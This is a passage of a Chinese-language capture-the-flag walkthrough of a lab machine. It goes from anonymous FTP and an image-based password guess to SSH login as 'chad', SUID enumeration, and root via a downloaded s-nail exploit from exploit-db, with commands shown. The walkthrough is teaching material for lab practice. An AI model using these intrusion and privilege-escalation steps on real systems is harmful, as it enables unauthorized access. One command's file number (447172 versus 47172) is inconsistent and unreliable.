9 换个思路,ftp匿名(Anonymous)走起,发现有个文件
10 将文件下载回来,用记事本打开,发现 PK 头,文件类型为 rar
11 改后缀为 rar 文件,打开发现是文本文件
得到 用户名为chad,看来密码就在那个图片中了,哎呀看到光明了,冲冲冲~
12 访问图片地址:/drippinchad.png
13 根据图片提示密码就是该建筑名称,百度识图整一波,gogogo~
14 得知该建筑为女儿塔,百度其英文名:
15 Maiden's Tower 尝试用此密码登录ssh发现失败,后来尝试了几种组合发现密码为 maidenstower,成功连接ssh:
ssh chad@192.168.154.178
16 发现是个低权限账户(目测要提权),先来瞅瞅文件吧,拿到1/2flag。
17 拿到低权限的shell后经常做的几件事:
1、看系统发行版本 lsb_release -a 2、查看内核版本 uname -a 3、当前用户权限 4、列举suid文件(找到高权限执行的程序) find / -perm -u=s 2>/dev/null 5、查看已经安装的包、运行的服务,过期版本可能会存在漏洞
18 查看系统的发行版本,内核版本,并未发现漏洞,对不起打扰了。
19 尝试使用suid提权,查看设置了 suid的程序:
find / -perm -u=s -type f 2>/dev/null
.
20 发现s-nail,尝试利用该程序提权(为什么选择该程序?别问,爱过!)Exploit-db 找下漏洞EXP
.
21 将EXP拷贝到靶机中,并赋予执行权限
1 exploit-db 下载 EXP
下载 EXP 命令:
wget https://www.exploit-db.com/download/47172
修改脚本去掉无用回车符号
sed -i "s/\r//" 447172
赋予 EXP 可执行权限
22 执行 EXP成功提权(这里可能会失败,多试几次就可)
23 在root桌面找到第二个flag
23 彩蛋--得知真实身份为 ERDAL KOMURCU
结语:
本人菜弟弟一个,大佬勿喷,谢谢,如果觉得个人写的还凑活,三连(点赞+关注+转发)一哈吧💪谢谢各位师傅,祝各位师傅玩的开心😊。